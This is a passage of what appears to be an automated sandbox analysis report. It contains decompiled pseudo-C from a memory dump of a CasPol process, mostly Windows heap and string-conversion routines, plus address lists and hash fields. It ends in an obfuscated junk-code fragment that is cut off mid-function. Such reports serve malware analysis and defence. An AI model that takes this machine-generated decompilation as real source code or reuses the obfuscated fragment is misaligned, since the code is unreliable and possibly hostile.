                                                                				intOrPtr _t42;
                                                                				unsigned int _t43;
                                                                				unsigned int _t50;
                                                                				signed char _t56;
                                                                				signed char _t60;
                                                                				signed int _t63;
                                                                				signed int _t73;
                                                                				signed int _t77;
                                                                				signed int _t80;
                                                                				unsigned int _t82;
                                                                				signed int _t87;
                                                                				signed int _t91;
                                                                				signed short _t96;
                                                                				signed short* _t98;
                                                                				signed char _t100;
                                                                				signed int* _t102;
                                                                				signed short* _t105;
                                                                				intOrPtr _t106;
                                                                				signed int _t108;
                                                                				signed int* _t110;
                                                                				void* _t113;
                                                                				signed int _t115;
                                                                				signed short* _t117;
                                                                				signed int _t118;
                                                                
                                                                				_t98 = _a16;
                                                                				_t87 = 0;
                                                                				_v16 = 0;
                                                                				if(_t98 == 0) {
                                                                					return 0xc00000f2;
                                                                				}
                                                                				_t110 = _a4;
                                                                				if(_t110 == 0) {
                                                                					if(_a12 == 0) {
                                                                						_t42 = 0xc000000d;
                                                                					} else {
                                                                						_t42 = E0165ED1A(_t98, _a20, _a12);
                                                                					}
                                                                					L19:
                                                                					return _t42;
                                                                				}
                                                                				_t43 = _a20;
                                                                				if((_t43 & 0x00000001) != 0) {
                                                                					_t42 = 0xc00000f3;
                                                                					goto L19;
                                                                				} else {
                                                                					_t102 = _t110;
                                                                					_t105 =  &(_t98[_t43 >> 1]);
                                                                					_v8 = _t105;
                                                                					_v12 = _a8 + _t110;
                                                                					L4:
                                                                					while(1) {
                                                                						L4:
                                                                						while(1) {
                                                                							L4:
                                                                							if(_t98 >= _t105) {
                                                                								if(_t87 == 0) {
                                                                									L17:
                                                                									_t106 = _v16;
                                                                									L18:
                                                                									_t42 = _t106;
                                                                									 *_a12 = _t102 - _a4;
                                                                									goto L19;
                                                                								}
                                                                								L8:
                                                                								_t13 = _t87 - 0xd800; // -55295
                                                                								if(_t13 <= 0x7ff) {
                                                                									_v16 = 0x107;
                                                                									_t87 = 0xfffd;
                                                                								}
                                                                								_t113 = 1;
                                                                								if(_t87 > 0x7f) {
                                                                									if(_t87 > 0x7ff) {
                                                                										if(_t87 > 0xffff) {
                                                                											_t113 = 2;
                                                                										}
                                                                										_t113 = _t113 + 1;
                                                                									}
                                                                									_t113 = _t113 + 1;
                                                                								}
                                                                								if(_t102 > _v12 - _t113) {
                                                                									_t106 = 0xc0000023;
                                                                									goto L18;
                                                                								} else {
                                                                									if(_t87 > 0x7f) {
                                                                										_t50 = _t87;
                                                                										if(_t87 > 0x7ff) {
                                                                											if(_t87 > 0xffff) {
                                                                												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
                                                                												_t102 =  &(_t102[0]);
                                                                												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
                                                                											} else {
                                                                												_t56 = _t50 >> 0x0000000c | 0x000000e0;
                                                                											}
                                                                											 *_t102 = _t56;
                                                                											_t102 =  &(_t102[0]);
                                                                											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
                                                                										} else {
                                                                											_t60 = _t50 >> 0x00000006 | 0x000000c0;
                                                                										}
                                                                										 *_t102 = _t60;
                                                                										_t102 =  &(_t102[0]);
                                                                										_t87 = _t87 & 0x0000003f | 0x00000080;
                                                                									}
                                                                									 *_t102 = _t87;
                                                                									_t102 =  &(_t102[0]);
                                                                									_t63 = _t105 - _t98 >> 1;
                                                                									_t115 = _v12 - _t102;
                                                                									if(_t63 > 0xd) {
                                                                										if(_t115 < _t63) {
                                                                											_t63 = _t115;
                                                                										}
                                                                										_t22 = _t63 - 5; // -5
                                                                										_t117 =  &(_t98[_t22]);
                                                                										if(_t98 < _t117) {
                                                                											do {
                                                                												_t91 =  *_t98 & 0x0000ffff;
                                                                												_t100 =  &(_t98[1]);
                                                                												if(_t91 > 0x7f) {
                                                                													L58:
                                                                													if(_t91 > 0x7ff) {
                                                                														_t38 = _t91 - 0xd800; // -55296
                                                                														if(_t38 <= 0x7ff) {
                                                                															if(_t91 > 0xdbff) {
                                                                																_t98 = _t100 - 2;
                                                                																break;
                                                                															}
                                                                															_t108 =  *_t100 & 0x0000ffff;
                                                                															_t98 = _t100 + 2;
                                                                															_t39 = _t108 - 0xdc00; // -54273
                                                                															if(_t39 > 0x3ff) {
                                                                																_t98 = _t98 - 4;
                                                                																break;
                                                                															}
                                                                															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
                                                                															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
                                                                															_t102 =  &(_t102[0]);
                                                                															_t73 = _t91 & 0x0003f000 | 0x00080000;
                                                                															L65:
                                                                															_t117 = _t117 - 2;
                                                                															 *_t102 = _t73 >> 0xc;
                                                                															_t102 =  &(_t102[0]);
                                                                															_t77 = _t91 & 0x00000fc0 | 0x00002000;
                                                                															L66:
                                                                															 *_t102 = _t77 >> 6;
                                                                															_t117 = _t117 - 2;
                                                                															_t102[0] = _t91 & 0x0000003f | 0x00000080;
                                                                															_t102 =  &(_t102[0]);
                                                                															goto L30;
                                                                														}
                                                                														_t73 = _t91 | 0x000e0000;
                                                                														goto L65;
                                                                													}
                                                                													_t77 = _t91 | 0x00003000;
                                                                													goto L66;
                                                                												}
                                                                												 *_t102 = _t91;
                                                                												_t102 =  &(_t102[0]);
                                                                												if((_t100 & 0x00000002) != 0) {
                                                                													_t91 =  *_t100 & 0x0000ffff;
                                                                													_t100 = _t100 + 2;
                                                                													if(_t91 > 0x7f) {
                                                                														goto L58;
                                                                													}
                                                                													 *_t102 = _t91;
                                                                													_t102 =  &(_t102[0]);
                                                                												}
                                                                												if(_t100 >= _t117) {
                                                                													break;
                                                                												} else {
                                                                													goto L28;
                                                                												}
                                                                												while(1) {
                                                                													L28:
                                                                													_t80 =  *(_t100 + 4);
                                                                													_t96 =  *_t100;
                                                                													_v20 = _t80;
                                                                													if(((_t80 | _t96) & 0xff80ff80) != 0) {
                                                                														break;
                                                                													}
                                                                													_t82 = _v20;
                                                                													_t100 = _t100 + 8;
                                                                													 *_t102 = _t96;
                                                                													_t102[0] = _t82;
                                                                													_t102[0] = _t96 >> 0x10;
                                                                													_t102[0] = _t82 >> 0x10;
                                                                													_t102 =  &(_t102[1]);
                                                                													if(_t100 < _t117) {
                                                                														continue;
                                                                													}
                                                                													goto L30;
                                                                												}
                                                                												_t91 = _t96 & 0x0000ffff;
                                                                												_t100 = _t100 + 2;
                                                                												if(_t91 > 0x7f) {
                                                                													goto L58;
                                                                												}
                                                                												 *_t102 = _t91;
                                                                												_t102 =  &(_t102[0]);
                                                                												L30:
                                                                											} while (_t98 < _t117);
                                                                											_t105 = _v8;
                                                                										}
                                                                										goto L32;
                                                                									} else {
                                                                										if(_t115 < _t63) {
                                                                											L32:
                                                                											_t87 = 0;
                                                                											continue;
                                                                										}
                                                                										while(_t98 < _t105) {
                                                                											_t87 =  *_t98 & 0x0000ffff;
                                                                											_t98 =  &(_t98[1]);
                                                                											if(_t87 > 0x7f) {
                                                                												L7:
                                                                												_t12 = _t87 - 0xd800; // -55290
                                                                												if(_t12 <= 0x3ff) {
                                                                													goto L4;
                                                                												}
                                                                												goto L8;
                                                                											}
                                                                											 *_t102 = _t87;
                                                                											_t102 =  &(_t102[0]);
                                                                										}
                                                                										goto L17;
                                                                									}
                                                                								}
                                                                							}
                                                                							_t118 =  *_t98 & 0x0000ffff;
                                                                							if(_t87 != 0) {
                                                                								_t36 = _t118 - 0xdc00; // -56314
                                                                								if(_t36 <= 0x3ff) {
                                                                									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
                                                                									_t98 =  &(_t98[1]);
                                                                								}
                                                                								goto L8;
                                                                							}
                                                                							_t87 = _t118;
                                                                							_t98 =  &(_t98[1]);
                                                                							goto L7;
                                                                						}
                                                                					}
                                                                				}
                                                                			}































                                                                0x0169b76c
                                                                0x0169b781
                                                                0x0169b788
                                                                0x0169b78b
                                                                0x0169b75a
                                                                0x0169b75d
                                                                0x0169b75d
                                                                0x0169b78d
                                                                0x0169b792
                                                                0x0169b793
                                                                0x0169b793
                                                                0x0165ec54
                                                                0x0165ec56
                                                                0x0165ec57
                                                                0x0165ec59
                                                                0x0165ec5e
                                                                0x0165ecaa
                                                                0x0165ed16
                                                                0x0165ed16
                                                                0x0165ecac
                                                                0x0165ecaf
                                                                0x0165ecb4
                                                                0x0165ecb6
                                                                0x0165ecb6
                                                                0x0165ecb9
                                                                0x0165ecbf
                                                                0x0169b7c1
                                                                0x0169b7c8
                                                                0x0169b7d3
                                                                0x0169b7db
                                                                0x0169b7ec
                                                                0x0169b858
                                                                0x00000000
                                                                0x0169b858
                                                                0x0169b7ee
                                                                0x0169b7f1
                                                                0x0169b7f4
                                                                0x0169b7ff
                                                                0x0169b850
                                                                0x00000000
                                                                0x0169b850
                                                                0x0169b80a
                                                                0x0169b813
                                                                0x0169b81c
                                                                0x0169b81d
                                                                0x0169b822
                                                                0x0169b825
                                                                0x0169b828
                                                                0x0169b831
                                                                0x0169b832
                                                                0x0169b837
                                                                0x0169b840
                                                                0x0169b842
                                                                0x0169b845
                                                                0x0169b848
                                                                0x00000000
                                                                0x0169b848
                                                                0x0169b7df
                                                                0x00000000
                                                                0x0169b7df
                                                                0x0169b7cc
                                                                0x00000000
                                                                0x0169b7cc
                                                                0x0165ecc5
                                                                0x0165ecc7
                                                                0x0165eccb
                                                                0x0169b79b
                                                                0x0169b79e
                                                                0x0169b7a4
                                                                0x00000000
                                                                0x00000000
                                                                0x0169b7a6
                                                                0x0169b7a8
                                                                0x0169b7a8
                                                                0x0165ecd3
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0165ecd5
                                                                0x0165ecd5
                                                                0x0165ecd5
                                                                0x0165ecd8
                                                                0x0165ecda
                                                                0x0165ece4
                                                                0x00000000
                                                                0x00000000
                                                                0x0165ecea
                                                                0x0165eced
                                                                0x0165ecf0
                                                                0x0165ecf2
                                                                0x0165ecfb
                                                                0x0165ecfe
                                                                0x0165ed01
                                                                0x0165ed06
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0165ed06
                                                                0x0169b7ae
                                                                0x0169b7b1
                                                                0x0169b7b7
                                                                0x00000000
                                                                0x00000000
                                                                0x0169b7b9
                                                                0x0169b7bb
                                                                0x0165ed08
                                                                0x0165ed08
                                                                0x0165ed0c
                                                                0x0165ed0c
                                                                0x00000000
                                                                0x0165ec60
                                                                0x0165ec62
                                                                0x0165ed0f
                                                                0x0165ed0f
                                                                0x00000000
                                                                0x0165ed0f
                                                                0x0165ec68
                                                                0x0165ec6c
                                                                0x0165ec6f
                                                                0x0165ec75
                                                                0x0165ec0d
                                                                0x0165ec0d
                                                                0x0165ec18
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0165ec18
                                                                0x0165ec77
                                                                0x0165ec79
                                                                0x0165ec79
                                                                0x00000000
                                                                0x0165ec68
                                                                0x0165ec5e
                                                                0x0165ec3e
                                                                0x0165ebfd
                                                                0x0165ec02
                                                                0x0169b701
                                                                0x0169b70c
                                                                0x0169b71b
                                                                0x0169b71d
                                                                0x0169b71d
                                                                0x00000000
                                                                0x0169b70c
                                                                0x0165ec08
                                                                0x0165ec0a
                                                                0x00000000
                                                                0x0165ec0a
                                                                0x0165ebf5
                                                                0x0165ebf5

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                                                • Instruction ID: c3410ea2b5707f35171d8f8c05190955022b6e5e829d188031d61bc2895ff60f
                                                                • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                                                • Instruction Fuzzy Hash: 62815632A082568FEF254E6CDCC167DFB59EF52210F2C42BADD528F341C226DA46D392
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 91%
                                                                			E0164AB40(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                				intOrPtr _v8;
                                                                				signed short _v12;
                                                                				signed int _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr* _v24;
                                                                				intOrPtr* _v28;
                                                                				intOrPtr _t69;
                                                                				intOrPtr* _t70;
                                                                				intOrPtr _t71;
                                                                				intOrPtr _t73;
                                                                				void* _t74;
                                                                				signed int _t77;
                                                                				signed int _t79;
                                                                				signed int _t82;
                                                                				signed int _t88;
                                                                				unsigned int _t97;
                                                                				unsigned int _t99;
                                                                				unsigned int _t105;
                                                                				unsigned int _t107;
                                                                				intOrPtr* _t111;
                                                                				unsigned int _t118;
                                                                				void* _t123;
                                                                				intOrPtr _t127;
                                                                				signed int _t128;
                                                                				void* _t131;
                                                                				signed char _t136;
                                                                				signed char _t141;
                                                                				signed char _t146;
                                                                				signed int _t151;
                                                                				signed int _t153;
                                                                				unsigned int _t155;
                                                                				intOrPtr _t158;
                                                                				void* _t164;
                                                                				signed short _t167;
                                                                				void* _t171;
                                                                				void* _t173;
                                                                				intOrPtr* _t175;
                                                                				intOrPtr* _t178;
                                                                				signed short _t180;
                                                                				signed short _t182;
                                                                
                                                                				_t149 = __ecx;
                                                                				_t111 =  *((intOrPtr*)(__edx + 0x18));
                                                                				_v24 = __edx;
                                                                				_t69 =  *((intOrPtr*)(_t111 + 4));
                                                                				_t158 = _a12;
                                                                				_v8 = __ecx;
                                                                				_v16 = _a8 -  *((intOrPtr*)(__edx + 0x14));
                                                                				_v28 = _t111;
                                                                				if(_t111 == _t69) {
                                                                					L7:
                                                                					_t70 = _t111;
                                                                					goto L8;
                                                                				} else {
                                                                					_t127 = _a4;
                                                                					if(_t127 == 0) {
                                                                						_t171 = _t158 -  *((intOrPtr*)(_t69 + 0x14));
                                                                					} else {
                                                                						_t182 =  *(_t69 - 8);
                                                                						_v20 = _t69 + 0xfffffff8;
                                                                						if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
                                                                							_t105 =  *(__ecx + 0x50) ^ _t182;
                                                                							_v12 = _t105;
                                                                							_t107 = _v12;
                                                                							_t146 = _t105 >> 0x00000010 ^ _t105 >> 0x00000008 ^ _t107;
                                                                							if(_t107 >> 0x18 != _t146) {
                                                                								_push(_t146);
                                                                								E016EA80D(__ecx, _v20, 0, 0);
                                                                								_t149 = _v8;
                                                                							}
                                                                							_t182 = _v12;
                                                                							_t127 = _a4;
                                                                						}
                                                                						_t171 = _t158 - (_t182 & 0x0000ffff);
                                                                					}
                                                                					if(_t171 <= 0) {
                                                                						_t71 =  *_t111;
                                                                						if(_t127 == 0) {
                                                                							_t173 = _t158 -  *((intOrPtr*)(_t71 + 0x14));
                                                                						} else {
                                                                							_t180 =  *(_t71 - 8);
                                                                							_v20 = _t71 + 0xfffffff8;
                                                                							if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                                                								_t97 =  *(_t149 + 0x50) ^ _t180;
                                                                								_v12 = _t97;
                                                                								_t99 = _v12;
                                                                								_t141 = _t97 >> 0x00000010 ^ _t97 >> 0x00000008 ^ _t99;
                                                                								if(_t99 >> 0x18 != _t141) {
                                                                									_push(_t141);
                                                                									E016EA80D(_t149, _v20, 0, 0);
                                                                									_t149 = _v8;
                                                                								}
                                                                								_t180 = _v12;
                                                                								_t127 = _a4;
                                                                							}
                                                                							_t173 = _t158 - (_t180 & 0x0000ffff);
                                                                						}
                                                                						if(_t173 <= 0) {
                                                                							return  *_t111;
                                                                						} else {
                                                                							_t175 = _v24;
                                                                							if( *_t175 != 0 || _a8 !=  *((intOrPtr*)(_t175 + 4)) - 1) {
                                                                								_t128 = _v16;
                                                                								_t73 =  *((intOrPtr*)(_t175 + 0x1c));
                                                                								_t151 = _t128 >> 5;
                                                                								_t164 = ( *((intOrPtr*)(_t175 + 4)) -  *((intOrPtr*)(_t175 + 0x14)) >> 5) - 1;
                                                                								_t118 =  !((1 << (_t128 & 0x0000001f)) - 1) &  *(_t73 + _t151 * 4);
                                                                								_t74 = _t73 + _t151 * 4;
                                                                								if(1 == 0) {
                                                                									while(_t151 <= _t164) {
                                                                										_t118 =  *(_t74 + 4);
                                                                										_t74 = _t74 + 4;
                                                                										_t151 = _t151 + 1;
                                                                										if(_t118 == 0) {
                                                                											continue;
                                                                										} else {
                                                                											goto L28;
                                                                										}
                                                                										goto L51;
                                                                									}
                                                                									if(_t118 != 0) {
                                                                										goto L28;
                                                                									} else {
                                                                										goto L40;
                                                                									}
                                                                								} else {
                                                                									L28:
                                                                									if(_t118 == 0) {
                                                                										_t77 = _t118 >> 0x00000010 & 0x000000ff;
                                                                										if(_t77 != 0) {
                                                                											_t79 = ( *(_t77 + 0x16084d0) & 0x000000ff) + 0x10;
                                                                										} else {
                                                                											_t57 = (_t118 >> 0x18) + 0x16084d0; // 0x10008
                                                                											_t79 = ( *_t57 & 0x000000ff) + 0x18;
                                                                										}
                                                                									} else {
                                                                										_t82 = _t118 & 0x000000ff;
                                                                										if(_t118 == 0) {
                                                                											_t79 = ( *((_t118 >> 0x00000008 & 0x000000ff) + 0x16084d0) & 0x000000ff) + 8;
                                                                										} else {
                                                                											_t79 =  *(_t82 + 0x16084d0) & 0x000000ff;
                                                                										}
                                                                									}
                                                                									_t153 = (_t151 << 5) + _t79;
                                                                									if( *((intOrPtr*)(_t175 + 8)) != 0) {
                                                                										_t153 = _t153 + _t153;
                                                                									}
                                                                									_t70 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t153 * 4));
                                                                									L8:
                                                                									return _t70;
                                                                								}
                                                                							} else {
                                                                								_t88 = _v16;
                                                                								if( *((intOrPtr*)(_t175 + 8)) != 0) {
                                                                									_t88 = _t88 + _t88;
                                                                								}
                                                                								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t88 * 4));
                                                                								if(_t111 == _t178) {
                                                                									L40:
                                                                									return 0;
                                                                								} else {
                                                                									do {
                                                                										if(_t127 == 0) {
                                                                											_t131 = _t158 -  *((intOrPtr*)(_t178 + 0x14));
                                                                										} else {
                                                                											_t167 =  *(_t178 - 8);
                                                                											_t123 = _t178 - 8;
                                                                											if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                                                												_t155 =  *(_t149 + 0x50) ^ _t167;
                                                                												_t167 = _t155;
                                                                												_t136 = _t155 >> 0x00000010 ^ _t155 >> 0x00000008 ^ _t155;
                                                                												_t149 = _v8;
                                                                												if(_t155 >> 0x18 != _t136) {
                                                                													_push(_t136);
                                                                													E016EA80D(_t149, _t123, 0, 0);
                                                                													_t149 = _v8;
                                                                												}
                                                                											}
                                                                											_t111 = _v28;
                                                                											_t158 = _a12;
                                                                											_t131 = _t158 - (_t167 & 0x0000ffff);
                                                                										}
                                                                										if(_t131 <= 0) {
                                                                											return _t178;
                                                                										} else {
                                                                											goto L24;
                                                                										}
                                                                										goto L51;
                                                                										L24:
                                                                										_t178 =  *_t178;
                                                                										_t127 = _a4;
                                                                									} while (_t111 != _t178);
                                                                									goto L40;
                                                                								}
                                                                							}
                                                                						}
                                                                					} else {
                                                                						goto L7;
                                                                					}
                                                                				}
                                                                				L51:
                                                                			}


                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 99eba84cbb387ec0c4f26967e3a393d9e672ac0bd4bfc0a7be42ac262f2d8531
                                                                • Instruction ID: 9ebc09d77b197fd8ccaeb699889c65830b2f493c9d52c73fd935b70012251b7b
                                                                • Opcode Fuzzy Hash: 99eba84cbb387ec0c4f26967e3a393d9e672ac0bd4bfc0a7be42ac262f2d8531
                                                                • Instruction Fuzzy Hash: EB81D132A40219ABEB24CF9DCC9477AB7F1EF84215F1A4299D9829F381D730ED45CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 98%
                                                                			E016F25DD(intOrPtr __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				intOrPtr _v16;
                                                                				signed int _v20;
                                                                				intOrPtr _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				signed int _t74;
                                                                				signed int _t77;
                                                                				signed int _t80;
                                                                				signed int _t82;
                                                                				signed int _t102;
                                                                				signed int _t117;
                                                                				signed int _t121;
                                                                				signed int _t122;
                                                                				signed int _t123;
                                                                				signed int _t132;
                                                                				signed int _t133;
                                                                				signed int _t134;
                                                                				intOrPtr _t135;
                                                                				void* _t154;
                                                                				signed int _t160;
                                                                				signed int _t168;
                                                                				unsigned int _t175;
                                                                				signed int _t185;
                                                                				signed int _t187;
                                                                				signed int _t189;
                                                                				signed int _t190;
                                                                				signed int _t191;
                                                                				signed int _t193;
                                                                				signed int _t194;
                                                                				unsigned int _t200;
                                                                				unsigned int _t201;
                                                                				signed char _t202;
                                                                				signed int _t204;
                                                                				signed int _t210;
                                                                				intOrPtr _t211;
                                                                				signed int _t212;
                                                                
                                                                				_t133 = _a4;
                                                                				_v24 = __edx;
                                                                				_v16 = __ecx;
                                                                				E016F2E3F(__ecx, __edx, __eflags, _t133);
                                                                				_t204 = _a8;
                                                                				_t187 = 0x10;
                                                                				_t210 = (( *_t133 ^  *0x1716110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
                                                                				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
                                                                					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
                                                                					_t132 = _t185 << 3;
                                                                					if(_t132 >= _t187) {
                                                                						if(__eflags != 0) {
                                                                							__eflags = _t132 - 0x20;
                                                                							if(_t132 < 0x20) {
                                                                								_t204 = _t204 + 1;
                                                                								_t210 = _t210 - 1;
                                                                								__eflags = _t210;
                                                                							}
                                                                						}
                                                                					} else {
                                                                						_t204 = _t204 + _t185;
                                                                						_t210 = _t210 - _t185;
                                                                					}
                                                                				}
                                                                				if(_t210 << 3 < _t187) {
                                                                					_t204 = _t204 + _t210;
                                                                				}
                                                                				_t74 =  *0x1716110; // 0x3951a168
                                                                				asm("sbb edx, edx");
                                                                				_t189 =  !_t187 & _t210;
                                                                				_t211 = _v24;
                                                                				_v20 = _t189;
                                                                				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
                                                                				_t152 = _t133 - _t211;
                                                                				_t77 = _t133 - _t211 >> 0xc;
                                                                				_v28 = _t77;
                                                                				_t80 = (_t77 ^  *0x1716110 ^ _t133) & 0x000000ff;
                                                                				_v32 = _t80;
                                                                				 *(_t133 + 4) = _t80;
                                                                				_t82 = _t204 << 3;
                                                                				if(_t189 != 0) {
                                                                					_t82 = _t82 + 0x10;
                                                                				}
                                                                				_t190 = _t189 | 0xffffffff;
                                                                				_t154 = 0x3f;
                                                                				_v12 = E0166D340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
                                                                				_v8 = _t190;
                                                                				_t191 = _t190 | 0xffffffff;
                                                                				_v12 = _v12 & E0166D0F0(_t86 | 0xffffffff, _v28, _t191);
                                                                				_v8 = _v8 & _t191;
                                                                				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
                                                                				_t212 = _v20;
                                                                				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
                                                                				_v12 = _t193;
                                                                				_v8 = _t160;
                                                                				if((_t193 | _t160) != 0) {
                                                                					 *(_t133 + 4) = _v32 | 0x00000200;
                                                                					_t117 = _a12 & 0x00000001;
                                                                					_v32 = _t117;
                                                                					if(_t117 == 0) {
                                                                						E0163FFB0(_t133, _t204, _v16);
                                                                						_t193 = _v12;
                                                                					}
                                                                					_t212 = _v20;
                                                                					_t200 =  !_v8;
                                                                					_t121 = _t200 & 0x000000ff;
                                                                					_t201 = _t200 >> 8;
                                                                					_t44 = _t121 + 0x160ac00; // 0x6070708
                                                                					_t122 = _t201 & 0x000000ff;
                                                                					_t202 = _t201 >> 8;
                                                                					_t175 = _t202 >> 8;
                                                                					_t45 = _t122 + 0x160ac00; // 0x6070708
                                                                					_t123 = _t202 & 0x000000ff;
                                                                					_t47 = _t175 + 0x160ac00; // 0x6060706
                                                                					_t48 = _t123 + 0x160ac00; // 0x6070708
                                                                					_t142 = _v16;
                                                                					if(E016F2FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), 1) < 0) {
                                                                						_t212 = _t212 + _t204;
                                                                						_t204 = 0;
                                                                					}
                                                                					if(_v32 == 0) {
                                                                						E01642280(_t125, _t142);
                                                                					}
                                                                					_t133 = _a4;
                                                                					 *_a16 = 0xff;
                                                                					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
                                                                				}
                                                                				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x1716110 ^ _t133) & 0x0000fffe;
                                                                				if(_t212 != 0) {
                                                                					_t194 = _t133 + _t204 * 8;
                                                                					_t134 =  *0x1716110; // 0x3951a168
                                                                					if(_t204 == 0) {
                                                                						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
                                                                						__eflags = _t102;
                                                                					} else {
                                                                						_t102 = _t204 << 0x10;
                                                                					}
                                                                					_t135 = _v24;
                                                                					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
                                                                					_t168 = _t194 + _t212 * 8;
                                                                					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x1716110 ^ _t194) & 0x000000ff;
                                                                					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
                                                                						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x1716110 ^ _t168) & 0x7fff0000;
                                                                					}
                                                                					E016F241A(_v16, _t135, _t194, _a12, _a16);
                                                                				}
                                                                				return _t204;
                                                                			}

                                                                0x016f2760
                                                                0x016f2766
                                                                0x016f2769
                                                                0x016f276e
                                                                0x016f2771
                                                                0x016f2777
                                                                0x016f277d
                                                                0x016f2783
                                                                0x016f2791
                                                                0x016f27a7
                                                                0x016f27a9
                                                                0x016f27ab
                                                                0x016f27ab
                                                                0x016f27b1
                                                                0x016f27b4
                                                                0x016f27b4
                                                                0x016f27bc
                                                                0x016f27bf
                                                                0x016f27c2
                                                                0x016f27c2
                                                                0x016f27db
                                                                0x016f27df
                                                                0x016f27e5
                                                                0x016f27e8
                                                                0x016f27f0
                                                                0x016f27ff
                                                                0x016f27ff
                                                                0x016f27f2
                                                                0x016f27f4
                                                                0x016f27f4
                                                                0x016f281a
                                                                0x016f2824
                                                                0x016f2826
                                                                0x016f2834
                                                                0x016f2843
                                                                0x016f2858
                                                                0x016f2858
                                                                0x016f2866
                                                                0x016f2866
                                                                0x016f2873

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 602e66201168d1b7853ad5749509287bf87ba40b680fa529211c9781297ea828
                                                                • Instruction ID: 0ce115072b5f8a34c77b63cb785528032665536f576e51a1fece13bcb454ba22
                                                                • Opcode Fuzzy Hash: 602e66201168d1b7853ad5749509287bf87ba40b680fa529211c9781297ea828
                                                                • Instruction Fuzzy Hash: F481C172A101158BCB19CF79CCA16BABBE1FF88210B1A82ADE955DB395DB34D901CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 64%
                                                                			E00421B68(signed int __eax, signed int __ebx, intOrPtr __ecx, signed int __edx, void* __edi, signed int __esi) {
                                                                				signed int _t46;
                                                                				signed int _t47;
                                                                				signed int _t48;
                                                                				intOrPtr _t50;
                                                                				signed char _t52;
                                                                				signed int _t54;
                                                                				signed int _t55;
                                                                
                                                                				_t54 = __esi;
                                                                				_t52 = __edx;
                                                                				_t50 = __ecx;
                                                                				_t48 = __ebx;
                                                                				asm("sbb eax, 0x4eeb4b34");
                                                                				asm("rol dword [eax-0x327fd322], 0xa8");
                                                                				 *0x16c5c8ef =  *0x16c5c8ef + __ebx;
                                                                				_t55 =  *0x5289cc67;
                                                                				_t46 = __eax &  *0x4710d720;
                                                                				 *0xd73167e2 = __edx;
                                                                				 *0x7565f133 =  *0x7565f133 | _t46;
                                                                				asm("rcl dword [0x68649dd8], 0x53");
                                                                				_push(__ecx);
                                                                				_t47 = _t46 + 0x3d74df92;
                                                                				if(( *0x598113cb & __edx) >= 0) {
                                                                					L1:
                                                                					asm("sbb [0xc36efb09], edx");
                                                                					asm("adc [0x767ba821], ebx");
                                                                					 *0x240d8bd4 =  *0x240d8bd4 >> 0;
